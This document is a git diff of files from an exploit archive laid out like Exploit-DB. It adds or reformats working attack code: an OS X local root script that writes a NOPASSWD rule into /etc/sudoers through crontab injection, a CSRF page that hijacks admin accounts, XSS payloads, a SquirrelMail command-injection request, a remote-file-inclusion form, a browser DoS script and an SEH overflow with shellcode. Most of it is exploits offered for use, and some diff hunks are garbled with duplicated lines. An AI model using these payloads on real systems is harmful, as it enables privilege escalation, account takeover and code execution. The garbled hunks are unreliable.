--- a/platforms/multiple/remote/22140.c
+++ b/platforms/multiple/remote/22140.c
@ -1,10 +1,10 @@
-source: http://www.securityfocus.com/bid/6578/info
+// source: http://www.securityfocus.com/bid/6578/info
-The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
+// The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
-Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
+//  Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
-Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server.
+// Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server.
 /*****************************************************************
  * hoagie_statsme.c
--- a/platforms/osx/local/38371.py
+++ b/platforms/osx/local/38371.py
@ -0,0 +1,38 @@
 # CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
 # tested on osx 10.9.5 / 10.10.5
 # jul/2015
 # by rebel
 import os,time,sys
 env = {}
 s = os.stat("/etc/sudoers").st_size
 env['MallocLogFile'] = '/etc/crontab'
 env['MallocStackLogging'] = 'yes'
 env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
 sys.stderr.write("creating /etc/crontab..")
 p = os.fork()
 if p == 0:	
 	os.close(1)
 	os.close(2)
 	os.execve("/usr/bin/rsh",["rsh","localhost"],env)
 time.sleep(1)
 if "NOPASSWD" not in open("/etc/crontab").read():
 	sys.stderr.write("failed\n")
 	sys.exit(-1)
 sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")
 while os.stat("/etc/sudoers").st_size == s:
 	sys.stderr.write(".")	
 	time.sleep(1)
 sys.stderr.write("\ndone\n")
 os.system("sudo su")
--- a/platforms/php/webapps/38372.html
+++ b/platforms/php/webapps/38372.html
@ -0,0 +1,48 @@
 source: http://www.securityfocus.com/bid/58414/info
 Question2Answer is prone to a cross-site request-forgery vulnerability.
 Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
 Question2Answer 1.5.4 is vulnerable; other versions may also be affected.
 <html>
 <head>
 <title>Exploit for stealing admin's account in Question2Answer. Made by
 MustLive. http://www.example.com</title>
 </head>
 <body onLoad="StartCSRF()">
 <script>
 function StartCSRF() {
 for (var i=1;i<=2;i++) {
 var ifr = document.createElement("iframe");
 ifr.setAttribute('name', 'csrf'+i);
 ifr.setAttribute('width', '0');
 ifr.setAttribute('height', '0');
 document.body.appendChild(ifr);
 }
 CSRF1();
 setTimeout(CSRF2,1000);
 }
 function CSRF1() {
 window.frames["csrf1"].document.body.innerHTML = '<form name="hack"
 action="http://www.example.com/account"; method="post">n<input type="hidden"
 name="handle" value="test">n<input type="hidden" name="email"
 value="email () attacker com">n<input type="hidden" name="messages"
 value="1">n<input type="hidden" name="mailings" value="1">n<input
 type="hidden" name="field_1" value="test">n<input type="hidden"
 name="field_2" value="test">n<input type="hidden" name="field_3"
 value="test">n<input type="hidden" name="dosaveprofile"
 value="1">n</form>';
 window.frames["csrf1"].document.hack.submit();
 }
 function CSRF2() {
 window.frames["csrf2"].document.body.innerHTML = '<form name="hack"
 action="http://www.example.com/attack.php"; method="post">n<input type="hidden"
 name="do" value="1">n</form>';
 window.frames["csrf2"].document.hack.submit();
 }
 </script>
 </body>
 </html>
--- a/platforms/php/webapps/38373.txt
+++ b/platforms/php/webapps/38373.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/58415/info
 The Terillion Reviews plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
 Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. 
 ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
 alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
 </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
--- a/platforms/php/webapps/38374.txt
+++ b/platforms/php/webapps/38374.txt
@ -0,0 +1,13 @@
 source: http://www.securityfocus.com/bid/58417/info
 SWFUpload is prone to multiple cross-site scripting and content spoofing vulnerabilities because it fails to sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
 Content spoofing:
 http://www.example.com/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
 Cross-site scripting:
 http://www.example.com/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E 
--- a/platforms/php/webapps/38375.txt
+++ b/platforms/php/webapps/38375.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/58418/info
 Asteriskguru Queue Statistics is prone to an cross-site scripting vulnerability because it fails to sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
 http://www.example.com/public/error.php?warning=<XSS injection> 
--- a/platforms/php/webapps/38376.txt
+++ b/platforms/php/webapps/38376.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/58421/info
 The podPress plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 podPress 8.8.10.13 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}// 
--- a/platforms/php/webapps/38377.txt
+++ b/platforms/php/webapps/38377.txt
@ -0,0 +1,32 @@
 source: http://www.securityfocus.com/bid/58425/info
 Privoxy is prone to multiple information-disclosure vulnerabilities.
 Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This may aid in further attacks.
 Privoxy 3.0.20 is affected; other versions may also be vulnerable. 
 Response Code (current).: 407
 Response Headers (as seen by your browser).:
 HTTP/1.1 407 Proxy Authentication Required
 Date: Mon, 11 Mar 2013 17:01:59 GMT
 Server: ./msfcli auxiliary/server/capture/http set SRVPORT=80
 Proxy-Authenticate: Basic
 Vary: Accept-Encoding
 Content-Encoding: gzip
 Content-Length: 571
 Keep-Alive: timeout=15, max=99
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 Request Headers (as seen by the remote website)
 Host: c22.cc
 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://www.example.com/
 Connection: keep-alive
--- a/platforms/php/webapps/4173.txt
+++ b/platforms/php/webapps/4173.txt
@ -1,50 +1,50 @@
-SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability
+SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability
-
+
-Bugtraq ID: 24782
+Bugtraq ID: 24782
-
+
-----------------------------
+-----------------------------
-
+
-There are various vulnerabilities in this software! One is in
+There are various vulnerabilities in this software! One is in
-keyring_main.php!
+keyring_main.php!
-$fpr is not escaped from shellcommands!
+$fpr is not escaped from shellcommands!
-
+
-testbox:/home/w00t# cat /tmp/w00t
+testbox:/home/w00t# cat /tmp/w00t
-cat: /tmp/w00t: No such file or directory
+cat: /tmp/w00t: No such file or directory
-testbox:/home/w00t#
+testbox:/home/w00t#
-
+
-***@silverlaptop:~$ nc *** 80
+***@silverlaptop:~$ nc *** 80
-POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
+POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
-Host: ***
+Host: ***
-User-Agent: w00t
+User-Agent: w00t
-Keep-Alive: 300
+Keep-Alive: 300
-Connection: keep-alive
+Connection: keep-alive
-Cookie: Authentication Data for SquirrelMail
+Cookie: Authentication Data for SquirrelMail
-Content-Type: application/x-www-form-urlencoded
+Content-Type: application/x-www-form-urlencoded
-Content-Length: 140
+Content-Length: 140
-
+
-id=C5B1611B8E71C***&fpr= | touch /tmp/w00t |
+id=C5B1611B8E71C***&fpr= | touch /tmp/w00t |
-&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1
+&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1
-
+
-...
+...
-
+
-testbox:/home/w00t# cat /tmp/w00t
+testbox:/home/w00t# cat /tmp/w00t
-testbox:/home/w00t#
+testbox:/home/w00t#
-
+
-So we just executed 'touch /tmp/w00t'!
+So we just executed 'touch /tmp/w00t'!
-
+
-WabiSabiLabi tries to sell the exploit for 700 Euro! ;)
+WabiSabiLabi tries to sell the exploit for 700 Euro! ;)
-lol @ WabiSabiLabi!
+lol @ WabiSabiLabi!
-
+
-Greets:
+Greets:
-
+
-oli and all members of jmp-esp!
+oli and all members of jmp-esp!
-
+
-
+
-jmp-esp is looking for people who are interested in IT security!
+jmp-esp is looking for people who are interested in IT security!
-Currently we are looking for people who like to write articles for a
+Currently we are looking for people who like to write articles for a
-German ezine or are interested in exchanging informations, exploits...
+German ezine or are interested in exchanging informations, exploits...
-
+
-IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl)
+IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl)
-    #main
+    #main
-
+
-# milw0rm.com [2007-07-11]
+# milw0rm.com [2007-07-11]
--- a/platforms/php/webapps/5417.htm
+++ b/platforms/php/webapps/5417.htm
@ -1,58 +1,58 @@
-<html>
+<html>
-<head>
+<head>
-<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
-<title>Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</title>
+<title>Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</title>
-
+
-<script language="JavaScript">
+<script language="JavaScript">
-
+
-//'Bug found and Exploit coded by bd0rk
+//'Bug found and Exploit coded by bd0rk
-//'Vendor: http://www.foxymods-phpbb.com/
+//'Vendor: http://www.foxymods-phpbb.com/
-//'Download: http://www.foxymods-phpbb.com/download.php?id=7
+//'Download: http://www.foxymods-phpbb.com/download.php?id=7
-//'Contact: bd0rk[at]hackermail.com
+//'Contact: bd0rk[at]hackermail.com
-
+
-//'Vulnerable Code in line 21: include_once($phpbb_root_path . 'includes/lite.'.$phpEx);
+//'Vulnerable Code in line 21: include_once($phpbb_root_path . 'includes/lite.'.$phpEx);
-//'$phpbb_root_path is not declared before include
+//'$phpbb_root_path is not declared before include
-//'Greetings: str0ke, TheJT, rgod, Frauenarzt
+//'Greetings: str0ke, TheJT, rgod, Frauenarzt
-
+
-//#The german Hacker bd0rk
+//#The german Hacker bd0rk
-
+
-var dir="/includes/"
+var dir="/includes/"
-var file="/functions_portal.php?"
+var file="/functions_portal.php?"
-var parameter ="phpbb_root_path="
+var parameter ="phpbb_root_path="
-var shell="Insert your shellcode here"
+var shell="Insert your shellcode here"
-
+
-function command() {
+function command() {
-if (document.rfi.target1.value==""){
+if (document.rfi.target1.value==""){
-alert("Exploit failed...");
+alert("Exploit failed...");
-return false;
+return false;
-}
+}
-
+
-rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
+rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
-rfi.submit();
+rfi.submit();
-}
+}
-</script>
+</script>
-</head>
+</head>
-
+
-<body bgcolor="#000000">
+<body bgcolor="#000000">
-<center>
+<center>
-
+
-<p><b><font face="Verdana" size="2" color="#008000">Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</font></b></p>
+<p><b><font face="Verdana" size="2" color="#008000">Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</font></b></p>
-
+
-<p></p>
+<p></p>
-<form method="post" target="getting" name="rfi" onSubmit="command();">
+<form method="post" target="getting" name="rfi" onSubmit="command();">
-    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
+    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
-  </font><font color="#FF0000" size="2">&nbsp;</font></b>
+  </font><font color="#FF0000" size="2">&nbsp;</font></b>
-  <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
+  <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
-  <p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
+  <p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
-</form>
+</form>
-<p><br>
+<p><br>
-<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
+<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
-</p>
+</p>
-
+
-<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
+<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
-</center>
+</center>
-</body>
+</body>
-
+
-</html>
+</html>
-
+
-# milw0rm.com [2008-04-09]
+# milw0rm.com [2008-04-09]
--- a/platforms/php/webapps/8965.txt
+++ b/platforms/php/webapps/8965.txt
@ -1,38 +1,38 @@
-vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability 
+vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability 
-
+
-About:- 
+About:- 
-
+
-Radio and TV Add-on will add a radio and TV library to your forum.
+Radio and TV Add-on will add a radio and TV library to your forum.
-
+
-Features:- 
+Features:- 
-
+
- Users can add / delete / edit own stations
+- Users can add / delete / edit own stations
-
+
-For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2 
+For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2 
-
+
-Note:-  
+Note:-  
- 
+ 
- To exploit this Bug need to be registred!and after you are registered you can add new radio station
+- To exploit this Bug need to be registred!and after you are registered you can add new radio station
-  where name station can be "><script>alert(String.fromCharCode(88,83,83))</script>  
+  where name station can be "><script>alert(String.fromCharCode(88,83,83))</script>  
-  and URL "><script>alert(String.fromCharCode(88,83,83))</script>
+  and URL "><script>alert(String.fromCharCode(88,83,83))</script>
- 
+ 
-
+
-Poc: XSS 
+Poc: XSS 
-
+
-http://www.musicadigitale.net/forum/radioandtv.php?station=92 
+http://www.musicadigitale.net/forum/radioandtv.php?station=92 
- 
+ 
-Poc: Iframe 
+Poc: Iframe 
- 
+ 
-http://www.musicadigitale.net/forum/radioandtv.php?station=93 
+http://www.musicadigitale.net/forum/radioandtv.php?station=93 
- 
+ 
-Poc: Redirect 
+Poc: Redirect 
- 
+ 
-http://www.musicadigitale.net/forum/radioandtv.php?station=94
+http://www.musicadigitale.net/forum/radioandtv.php?station=94
-
+
-dorks:- inurl:radioandtv.php 
+dorks:- inurl:radioandtv.php 
-
+
-Bug founded by d3v1l [Avram Marius] 
+Bug founded by d3v1l [Avram Marius] 
- 
+ 
-Date: 14.06.2009 
+Date: 14.06.2009 
-
+
-# milw0rm.com [2009-06-15]
+# milw0rm.com [2009-06-15]
--- a/platforms/windows/dos/3430.html
+++ b/platforms/windows/dos/3430.html
@ -1,72 +1,72 @@
-<!--------------------------------------------------------------------------------
+<!--------------------------------------------------------------------------------
-Adobe PDF Reader plug-in AcroPDF.dll ver. 8.0.0.0 Resource Consumption
+Adobe PDF Reader plug-in AcroPDF.dll ver. 8.0.0.0 Resource Consumption
-author: shinnai
+author: shinnai
-mail: shinnai[at]autistici[dot]org
+mail: shinnai[at]autistici[dot]org
-site: http://www.shinnai.altervista.org
+site: http://www.shinnai.altervista.org
-
+
-Well, Adobe guys do a good job after the publication of a variety of
+Well, Adobe guys do a good job after the publication of a variety of
-bug in AcroPDF.dll, one for all
+bug in AcroPDF.dll, one for all
-
+
-From Secunia:
+From Secunia:
-"Input passed to a hosted PDF file is not properly sanitised by the
+"Input passed to a hosted PDF file is not properly sanitised by the
-  browser plug-in before being returned to users. This can be exploited
+  browser plug-in before being returned to users. This can be exploited
-  to execute arbitrary script code in a user's browser session in context
+  to execute arbitrary script code in a user's browser session in context
-  of an affected site."
+  of an affected site."
-
+
-So now the dll is able to understand when you're trying to insert something
+So now the dll is able to understand when you're trying to insert something
-wrong prompting you with "One or more of the query terms are too long."
+wrong prompting you with "One or more of the query terms are too long."
-and that's a good thing but... I thought "can this dll sanitise chars like 
+and that's a good thing but... I thought "can this dll sanitise chars like 
-%n"
+%n"
-Well the answer is: no.
+Well the answer is: no.
-
+
-Unfortunately (sure depends by the point of view) Internet Explorer is
+Unfortunately (sure depends by the point of view) Internet Explorer is
-not useful for a test 'cause a limited number of chars (only 2083) is 
+not useful for a test 'cause a limited number of chars (only 2083) is 
-admitted
+admitted
-in the address bar, so we need to use browser like Firefox and stuff like
+in the address bar, so we need to use browser like Firefox and stuff like
-that.
+that.
-When you browse to a hosted pdf file like this
+When you browse to a hosted pdf file like this
-http://somesite/poc.pdf#search=%n%n%n... x 10000 (or much more if you like)
+http://somesite/poc.pdf#search=%n%n%n... x 10000 (or much more if you like)
-the browse will stop to answer until the process AcroRd32.exe crashes,
+the browse will stop to answer until the process AcroRd32.exe crashes,
-the CPU usage is about 50-60% and the paging file usage grow until
+the CPU usage is about 50-60% and the paging file usage grow until
-it's full and you have the message "Insufficient virtual memory..."
+it's full and you have the message "Insufficient virtual memory..."
-Here's a proof of concept, for online demonstration see:
+Here's a proof of concept, for online demonstration see:
-http://www.shinnai.altervista.org/adobe.html
+http://www.shinnai.altervista.org/adobe.html
-
+
-txt version here: http://www.shinnai.altervista.org/txt/adobe.txt
+txt version here: http://www.shinnai.altervista.org/txt/adobe.txt
-------------------------------------------------------------------------------->
+-------------------------------------------------------------------------------->
-
+
-<script language="javascript">
+<script language="javascript">
-var browserName=navigator.appName;
+var browserName=navigator.appName;
-
+
-if (browserName=="Netscape")
+if (browserName=="Netscape")
-{var f = ""
+{var f = ""
-var c = ""
+var c = ""
-  for (var i = 0; i <= 10000; i++) {
+  for (var i = 0; i <= 10000; i++) {
-   var f = f + "%n";
+   var f = f + "%n";
-  }
+  }
-document.location = "http://www.shinnai.altervista.org/pucca.pdf#search=" + 
+document.location = "http://www.shinnai.altervista.org/pucca.pdf#search=" + 
-(f)
+(f)
-}
+}
-else if (browserName=='Opera')
+else if (browserName=='Opera')
-{var f = ""
+{var f = ""
-var c = ""
+var c = ""
-  for (var i = 0; i <= 10000; i++) {
+  for (var i = 0; i <= 10000; i++) {
-   var f = f + "%n";
+   var f = f + "%n";
-  }
+  }
-document.location = "http://www.shinnai.altervista.org/pucca.pdf#search=" + 
+document.location = "http://www.shinnai.altervista.org/pucca.pdf#search=" + 
-(f)
+(f)
-}
+}
-else if (browserName=='Microsoft Internet Explorer')
+else if (browserName=='Microsoft Internet Explorer')
-{
+{
-alert("This exploit doesn't work with IE. You need to use Firefox and stuff 
+alert("This exploit doesn't work with IE. You need to use Firefox and stuff 
-like that.");
+like that.");
-document.location="http://www.shinnai.altervista.org";
+document.location="http://www.shinnai.altervista.org";
-}
+}
-else
+else
-{
+{
-alert("Mmm... I don't know what are you browsing with here, so no martini no 
+alert("Mmm... I don't know what are you browsing with here, so no martini no 
-party.");
+party.");
-}
+}
-</script>
+</script>
-
+
-# milw0rm.com [2007-03-08]
+# milw0rm.com [2007-03-08]
--- a/platforms/windows/local/38362.py
+++ b/platforms/windows/local/38362.py
@ -16,7 +16,7 @@ freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe
 Vulnerable Product:
 ==================================================
-MakeSFX.exe v1.44
+MakeSFX.exe v1.44 
 Mar 19 2001 & Dec 10 2009 versions
@ -47,20 +47,14 @@ makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"]
 etc...
-The '/title' argument when supplied an overly long payload will overwrite
+The '/title' argument when supplied an overly long payload will overwrite NSEH & SEH exception handlers
-NSEH & SEH exception handlers
+causing buffer overflow, we can then execute our aribitrary shellcode. I have seen some applications using
-causing buffer overflow, we can then execute our aribitrary shellcode. I
+MakeSFX.exe from .bat files for some automation purposes, if the local .bat file is replaced by malicious
 have seen some applications using
 MakeSFX.exe from .bat files for some automation purposes, if the local .bat
 file is replaced by malicious
 one attackers can cause mayhem on the system.
-Both versions from 2001 & 2009 are vulnerable but exploit setup will be off
+Both versions from 2001 & 2009 are vulnerable but exploit setup will be off by 80 bytes.
-by 20 bytes.
+punksnotdead="/title"+"A"*1078+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Dec 10 2009)
-punksnotdead="A"*1078+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX
+punksnotdead="/title"+"A"*1158+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Mar 19 2001)
 v1.44 (Dec 10 2009)
 punksnotdead="A"*1158+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX
 v1.44 (Mar 19 2001)
 POC exploit code(s):
@ -68,10 +62,8 @@ POC exploit code(s):
 We will exploit MakeSFX v1.44 (Mar 19 2001).
-I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH,
+I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, Rebase all set to False, but it contains null 0x00.
-Rebase all set to False, but it contains null 0x00.
+So no suitable SEH instruction address avail, I will instead have to use mona.py to look for POP,POP,RET instruction
 So no suitable SEH instruction address avail, I will instead have to use
 mona.py to look for POP,POP,RET instruction
 in outside modules and we find some...
 e.g.
@ -102,7 +94,7 @@ sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
 nseh="\xEB\x06"+"\x90"*2
 seh=struct.pack('<L', 0x76F29529)
-punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10
+punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10  
 subprocess.Popen([pgm, punksnotdead], shell=False)
@ -129,8 +121,7 @@ Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and that due
 credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit is given to
-the author. The author is not responsible for any misuse of the information
+the author. The author is not responsible for any misuse of the information contained
 contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere.
--- a/platforms/windows/remote/22142.c
+++ b/platforms/windows/remote/22142.c
@ -1,6 +1,6 @@
-source: http://www.securityfocus.com/bid/6582/info
+// source: http://www.securityfocus.com/bid/6582/info
-It has been reported that the Half-Life client contains a format string vulnerability. When receiving messages from an administrator through the adminmod add-on package, the client does not properly handle input. This could result in denial of service, or code execution. 
+// It has been reported that the Half-Life client contains a format string vulnerability. When receiving messages from an administrator through the adminmod add-on package, the client does not properly handle input. This could result in denial of service, or code execution. 
 /*****************************************************************
  * hoagie_adminmod_client.c
--- a/platforms/windows/remote/22966.c
+++ b/platforms/windows/remote/22966.c
@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/8299/info
+// source: http://www.securityfocus.com/bid/8299/info
-Half-Life Client has been reported prone to a remotely exploitable buffer overflow condition.
+// Half-Life Client has been reported prone to a remotely exploitable buffer overflow condition.
-The issue presents itself in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking performed on both the parameter and value of data transmitted from the game server to the client, a malicious server may execute arbitrary code on an affected client.
+// The issue presents itself in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking performed on both the parameter and value of data transmitted from the game server to the client, a malicious server may execute arbitrary code on an affected client.
 /*
 *            m00 Security presents
--- a/platforms/windows/remote/8922.txt
+++ b/platforms/windows/remote/8922.txt
@ -1,217 +1,217 @@
-----BEGIN PGP SIGNED MESSAGE-----
+-----BEGIN PGP SIGNED MESSAGE-----
-Hash: SHA1
+Hash: SHA1
-
+
-      Core Security Technologies - CoreLabs Advisory
+      Core Security Technologies - CoreLabs Advisory
-           http://www.coresecurity.com/corelabs/
+           http://www.coresecurity.com/corelabs/
-
+
-    DX Studio Player Firefox plug-in command injection
+    DX Studio Player Firefox plug-in command injection
-
+
-
+
-
+
-1. *Advisory Information*
+1. *Advisory Information*
-
+
-Title: DX Studio Player Firefox plug-in command injection
+Title: DX Studio Player Firefox plug-in command injection
-Advisory ID: CORE-2009-0521
+Advisory ID: CORE-2009-0521
-Advisory URL:
+Advisory URL:
-http://www.coresecurity.com/content/DXStudio-player-firefox-plugin
+http://www.coresecurity.com/content/DXStudio-player-firefox-plugin
-Date published: 2009-06-09
+Date published: 2009-06-09
-Date of last update: 2009-06-09
+Date of last update: 2009-06-09
-Vendors contacted: Worldweaver
+Vendors contacted: Worldweaver
-Release mode: Coordinated release
+Release mode: Coordinated release
-
+
-
+
-2. *Vulnerability Information*
+2. *Vulnerability Information*
-
+
-Class: Command injection
+Class: Command injection
-Remotely Exploitable: Yes
+Remotely Exploitable: Yes
-Locally Exploitable: No
+Locally Exploitable: No
-Bugtraq ID: N/A
+Bugtraq ID: N/A
-CVE Name: CVE-2009-2011
+CVE Name: CVE-2009-2011
-
+
-
+
-3. *Vulnerability Description*
+3. *Vulnerability Description*
-
+
-DX Studio [1] is a complete integrated development environment for
+DX Studio [1] is a complete integrated development environment for
-creating interactive 3D graphics. DX Studio Player plug-in for Firefox
+creating interactive 3D graphics. DX Studio Player plug-in for Firefox
-[2] is vulnerable to a remote command execution vulnerability.
+[2] is vulnerable to a remote command execution vulnerability.
-
+
-
+
-4. *Vulnerable packages*
+4. *Vulnerable packages*
-
+
-   . DX Studio Player v3.0.29.0
+   . DX Studio Player v3.0.29.0
-   . DX Studio Player v3.0.22.0
+   . DX Studio Player v3.0.22.0
-   . DX Studio Player v3.0.12.0
+   . DX Studio Player v3.0.12.0
-   . Older versions are probably affected too, but they were not checked.
+   . Older versions are probably affected too, but they were not checked.
-
+
-
+
-5. *Non-vulnerable packages*
+5. *Non-vulnerable packages*
-
+
-   . DX Studio Player v3.0.29.1
+   . DX Studio Player v3.0.29.1
-
+
-
+
-6. *Vendor Information, Solutions and Workarounds*
+6. *Vendor Information, Solutions and Workarounds*
-
+
-On June 1st DXStudio team patched the current release 3.0.29 to 3.0.29.1
+On June 1st DXStudio team patched the current release 3.0.29 to 3.0.29.1
-for all new downloads to fix the problem with the Firefox plugin, and
+for all new downloads to fix the problem with the Firefox plugin, and
-also posted a sticky announce for all its users [3].
+also posted a sticky announce for all its users [3].
-
+
-
+
-7. *Credits*
+7. *Credits*
-
+
-This vulnerability was discovered and researched by Diego Juarez from
+This vulnerability was discovered and researched by Diego Juarez from
-Core Security Technologies.
+Core Security Technologies.
-
+
-
+
-8. *Technical Description / Proof of Concept Code*
+8. *Technical Description / Proof of Concept Code*
-
+
-DX Studio is a complete integrated development environment for creating
+DX Studio is a complete integrated development environment for creating
-interactive 3D graphics. DX Studio provides a javascript API in which
+interactive 3D graphics. DX Studio provides a javascript API in which
-the method 'shell.execute()' is defined as follows:
+the method 'shell.execute()' is defined as follows:
-
+
-/-----------
+/-----------
-
+
-Prototype:
+Prototype:
-shell.execute(commandString, [paramString], [commandIsProgId]);
+shell.execute(commandString, [paramString], [commandIsProgId]);
-
+
- -----------/
+- -----------/
-
+
-This method sends the 'commandString' to the Windows shell with optional
+This method sends the 'commandString' to the Windows shell with optional
-parameters in 'paramString'. For security reasons, this function is not
+parameters in 'paramString'. For security reasons, this function is not
-available when running in a web browser. If you set 'commandIsProgId' to
+available when running in a web browser. If you set 'commandIsProgId' to
-true, you can launch a utility by its 'ProgID', e.g. 'WMP.DVD' with
+true, you can launch a utility by its 'ProgID', e.g. 'WMP.DVD' with
-parameter 'play' would play a DVD in Windows Media Player.
+parameter 'play' would play a DVD in Windows Media Player.
-
+
-In our tests, despite what is stated in the documentation, we found that
+In our tests, despite what is stated in the documentation, we found that
-the function is actually available to both the Internet Explorer and
+the function is actually available to both the Internet Explorer and
-Firefox browser plug-ins. In the IE plug-in the user does get a warning
+Firefox browser plug-ins. In the IE plug-in the user does get a warning
-about the security implications of allowing such '.dxstudio' file to
+about the security implications of allowing such '.dxstudio' file to
-run. On Firefox however, there is no such warning whatsoever, allowing
+run. On Firefox however, there is no such warning whatsoever, allowing
-an attacker to execute arbitrary code on the client side by luring the
+an attacker to execute arbitrary code on the client side by luring the
-victim into clicking a link or visiting a malicious website.
+victim into clicking a link or visiting a malicious website.
-
+
-
+
-8.1. *Proof of Concept (header.xml)*
+8.1. *Proof of Concept (header.xml)*
-
+
-/-----------
+/-----------
-
+
-<?xml version="1.0" encoding="utf-8" standalone="yes"?>
+<?xml version="1.0" encoding="utf-8" standalone="yes"?>
-<dxstudio version="1.0.0" width="800" height="600"
+<dxstudio version="1.0.0" width="800" height="600"
-defaultscriptlanguage="javascript">
+defaultscriptlanguage="javascript">
-  <display frame="yes" hidecursor="no" hideconsole="no" hidecontext="no"
